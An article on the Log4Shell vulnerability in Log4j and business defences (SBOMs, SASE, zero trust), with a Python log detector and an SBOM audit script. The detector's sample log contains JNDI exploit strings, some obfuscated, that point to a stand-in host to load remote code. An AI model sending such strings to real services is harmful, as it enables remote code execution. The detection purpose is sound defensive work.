Feb 04 2022

In the Wake of Log4j Exploits, How Can Businesses Protect Themselves?

The security vulnerability, called one of the worst ever seen, highlights the importance of building infrastructure with proactive security baked in.

Late last year, a major vulnerability was revealed in a widely used open-source logging library, causing a degree of panic among software developers and IT professionals.

The challenges presented by the Log4j vulnerabilities — which Jen Easterly, director of the federal Cybersecurity and Infrastructure Security Agency (CISA), called “one of the most serious I’ve seen in my entire career, if not the most serious” — underscore that IT professionals must be less reactive in their approach, so that when a problem emerges, they can limit its impact on the overall network.

That might require a rethink of how infrastructure is managed.

What Kind of Vulnerability Affects Log4j in Java?

The vulnerability, tracked as CVE-2021-44228, was in Log4j, a widely used logging library for Java applications; exploiting it gives an attacker remote code execution. The library, maintained by the volunteer-led Apache Software Foundation, has existed for two decades. It has traditionally been a quiet part of many technology infrastructures, bundled into countless Java applications, appliances and commercial products rather than something most administrators ever configured directly.

But in late November 2021, the flaw was reported to the project, and it became public in early December. As reported by Bloomberg, the disclosure led to quick action on the part of the foundation as it worked to get the vulnerability fixed.


News of the vulnerability, soon called Log4Shell, spread quickly. Early reports emerged of servers running the game Minecraft being compromised. It quickly became clear, however, that the exposure was widespread and that many more popular applications and technology tools beyond games were affected.

“We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” Easterly said of the flaw.

Why Are These Vulnerabilities Harmful for Businesses?

Part of the challenge of Log4j is that the flaw sits in a feature of the library itself: Log4j 2 evaluated lookup expressions such as ${jndi:...} embedded in the text being logged, and a JNDI lookup can fetch and execute a Java class from a server the attacker controls. Anyone who can get such a string into a log entry (a username, a User-Agent header, a chat message) can therefore run code on the server without authentication. Those who attacked affected Minecraft servers did exactly that through the game’s chat function alone.
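As an added example (not from the original article, CDW, Trend Micro or the Log4j project), the detector below shows what the “interprets text as it’s being logged” problem looks like on the wire and how to spot exploitation attempts after the fact. Attackers and scanners hid the ${jndi:...} trigger behind nested lookups such as ${lower:j} or the ${name:-default} syntax, and behind URL encoding, so a plain substring match misses most of them; the script undoes those transformations before matching. The log lines, IP addresses and request paths are constructed for the example.

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in web access logs.

Added example; not code from the original article or the Log4j project.
Log4j 2 expanded ``${...}`` lookups inside the text it logged, so a string
such as ``${jndi:ldap://attacker/x}`` in any logged field (User-Agent,
username, chat message) made the server contact the attacker's server and
load the class it returned. Real attacks obfuscated the trigger with nested
lookups and URL encoding; this detector undoes those before matching.
"""
import re
from urllib.parse import unquote

# Innermost lookups that resolve to a literal string:
#   ${lower:X} / ${upper:X}                      -> X case-folded
#   ${anything:-X}  e.g. ${::-X}, ${env:NOPE:-X} -> the default value X
_INNER = re.compile(
    r"\$\{(lower|upper):([^${}]*)\}"   # groups 1, 2
    r"|\$\{[^${}]*:-([^${}]*)\}",      # group 3
    re.IGNORECASE,
)
# The trigger itself, once de-obfuscated; group 1 is the JNDI scheme.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(m):
    if m.group(1):                       # ${lower:X} / ${upper:X}
        inner = m.group(2)
        return inner.lower() if m.group(1).lower() == "lower" else inner.upper()
    return m.group(3)                    # ${...:-X}


def normalize(text, max_rounds=20):
    """URL-decode (twice: scanners often double-encode) and collapse
    nested lookups from the inside out until the text stops changing."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Return {'scheme', 'payload'} if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
    return {"scheme": m.group(1).lower(), "payload": payload}


def scan(lines):
    """(line number, finding) for every line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = scan_line(line)
        if finding:
            hits.append((n, finding))
    return hits


# Constructed sample access log (documentation IP ranges, invented requests).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:03:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:04:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:05:19 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fo%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.10 - - [10/Dec/2021:14:06:00 +0000] "GET /price?currency=${date:yyyy} HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={f['scheme']} payload={f['payload']}")
```

The last sample line carries a lookup (${date:yyyy}) but not a JNDI one, so it is not reported; the point of the normalization step is that lines 3 and 4, which contain no literal “${jndi:” at all, are. A match tells you an attempt was logged, not that it succeeded: follow up with outbound connection logs from the host to the LDAP or RMI port named in the payload.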

Combine this with the wide number of devices that have utilized Log4j over the years, some of which may be connected devices that haven’t been actively maintained, and you suddenly have a widespread problem.

The Apache Software Foundation has since released a series of patches — it took more than one to close the hole completely — but many deployments of the library will be hard to update, because it is embedded in products and devices that the organizations running them did not build and may not even know contain it.

William Malik, vice president of infrastructure strategies at Trend Micro, says that this incident reinforces the need to triage such situations to minimize the impact of the problem.


“Obviously, if it’s broken and you’re being exploited, then you do one of three things: You turn off logging; you apply whatever patch is available as quickly as possible; or you back things up and keep rolling with as much instrumentation and observation as possible, so you know what steps you took once you discovered there was a problem.”

More broadly, he says, a more fundamental approach needs to be considered.

How Can Businesses Protect Themselves Against More Vulnerabilities?

There are two important strategies to keep in mind when attempting to manage software vulnerabilities. The first is getting a better accounting of what technologies are in your infrastructure.

The increased use of open-source software, including Log4j but not limited to it, has underscored the need for a software bill of materials — an ingredient list for what’s in your infrastructure. CISA and other federal agencies have made a push to see these broadly implemented in the wake of Log4Shell and the recent wave of supply chain attacks.

Malik notes this is an important concept worth striving for, but says it is not an easy thing to implement on its own.

“You’ve got to know what you’re cooking with,” he says. “And the biggest challenge is to get that up to date and reoccurring, which is hard. I’m not throwing a rocket at anybody who hasn’t got this thing nailed down, because very few do — it’s a hard problem.”
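To make the “ingredient list” concrete, here is an added example (not from the article, CDW or Trend Micro) that audits a CycloneDX-style SBOM for Log4j artifacts. The SBOM content is constructed for the example. Only log4j-core contains the JNDI lookup code, so log4j-api on its own is not flagged, and the 1.x line (the separate log4j:log4j artifact) is reported as end-of-life rather than as affected by CVE-2021-44228. The 2.17.1 threshold is an assumption chosen for this example: it is the last of the December 2021 fixes for the 2.x line on Java 8 and newer; take your own threshold from the advisory source you follow.

```python
"""Audit a CycloneDX-style SBOM for vulnerable or unsupported Log4j artifacts.

Added example; not code from the original article, CDW or Trend Micro.
The SBOM below is constructed for the example. The threshold version is an
assumption to be replaced with the advisory your organization follows.
"""
import json

# Maven coordinates of the artifacts that matter.
LOG4J2_CORE = ("org.apache.logging.log4j", "log4j-core")   # contains the JNDI lookup
LOG4J1 = ("log4j", "log4j")                                # 1.x line, end-of-life since 2015
# Assumption: last of the December 2021 Log4j 2 fixes for Java 8 and newer.
FIXED_2X = "2.17.1"


def parse_version(v):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0).
    The trailing flag sorts pre-releases before the matching release."""
    main, _, pre = v.partition("-")
    nums = [int(p) for p in main.split(".") if p.isdigit()]
    nums += [0] * (3 - len(nums))
    return tuple(nums[:3]) + ((0,) if pre else (1,))


def classify(component):
    """Return 'vulnerable', 'ok', 'end-of-life', or None for unrelated components."""
    coords = (component.get("group", ""), component.get("name", ""))
    version = component.get("version", "")
    if coords == LOG4J1:
        return "end-of-life"        # not affected by CVE-2021-44228, but unsupported
    if coords != LOG4J2_CORE:
        return None                 # log4j-api, other libraries: not the vulnerable code
    return "vulnerable" if parse_version(version) < parse_version(FIXED_2X) else "ok"


def audit(sbom):
    """List (group, name, version, status) for every Log4j artifact in the SBOM."""
    findings = []
    for c in sbom.get("components", []):
        status = classify(c)
        if status is not None:
            findings.append((c.get("group", ""), c["name"], c.get("version", ""), status))
    return findings


# Constructed sample SBOM in CycloneDX JSON shape.
SAMPLE_SBOM = json.loads("""
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.17.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
    {"type": "library", "group": "log4j", "name": "log4j",
     "version": "1.2.17", "purl": "pkg:maven/log4j/log4j@1.2.17"},
    {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind",
     "version": "2.13.0", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.13.0"}
  ]
}
""")

if __name__ == "__main__":
    for group, name, version, status in audit(SAMPLE_SBOM):
        print(f"{status:12} {group}:{name}:{version}")
```

This is exactly the “hard to keep up to date” problem Malik describes: the check is trivial once the list exists, and the work is in producing the list for every build and every appliance. An SBOM generated from declared dependencies also misses copies of log4j-core that a vendor repackaged inside its own JAR, so pair it with a filesystem scan for JndiLookup.class on the hosts themselves.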

The second strategy, while more complicated to implement, could limit the damage from wide-reaching exploits. It involves building a security architecture that contains a zero-day such as Log4Shell before it turns into a fire.


What Frameworks Can Businesses Use to Address These Threats?

Two frameworks that can limit the damage from outside exploitation in situations like these have emerged in recent years.

The first, secure access service edge (SASE), is a networking and security model first outlined by Gartner in 2019. Rather than hauling all traffic back to a central data center and its perimeter appliances, SASE converges wide-area networking (typically SD-WAN) with cloud-delivered security services such as secure web gateways, cloud access security brokers, firewall as a service and zero-trust network access, enforced at points of presence close to the user. Because every connection passes through that policy layer, an exposed vulnerable service can be reached from far fewer places, which limits the impact of a vulnerability on the rest of the infrastructure.

“On the security side, SASE prescribes the converged offering of delivering unified threat and data protection capabilities,” a McAfee blog post notes. “This converged service is based upon a low-latency, ubiquitous footprint that is very close to the user location regardless of where they are.”

The other, zero-trust security, drops the assumption that anything inside the network can be trusted: whoever or whatever requests a resource must prove its identity and be authorized for that specific resource on every request, regardless of where on the network the request comes from.

“Zero trust includes the notion that you don’t assume that everything is working properly, which means you check on things from time to time,” Trend Micro’s Malik says. “And the frequency is going to depend on your level of risk.”

Despite misconceptions about the approach, it has proven an increasingly popular element of many security architectures because it bakes security into the ordinary course of business rather than bolting it on afterward.


How Can Businesses Implement These Frameworks?

Frameworks like SASE and zero trust come with requirements that go well beyond IT, into areas like building a culture around cybersecurity.

There is still a case for basic controls such as firewalls and network segmentation to limit how far an exploit can spread. Malik cites the example of a semiconductor manufacturing facility where a virus spread through every one of its machines in less than a minute.

“They had this huge, flat network, with no segmentation at all,” he says. “If they built 100 network segments, they would have lost 1 percent of capacity. As it was, they lost 100 percent of their capacity and they were down for a week.”

Ultimately, building an organization around a more sustainable framework means better, more thoughtful handling of security issues. A potential five-alarm fire like Log4Shell becomes something much more manageable, because zero-day exploits, malware and ransomware have little room to move within your infrastructure. That protects the business, and it also gives employees a better balance.

“You know, it’s thrilling to be in an organization that is not governed by rules and procedures,” he says. “But it also means you don’t get to go to your kid’s ballet recital.”

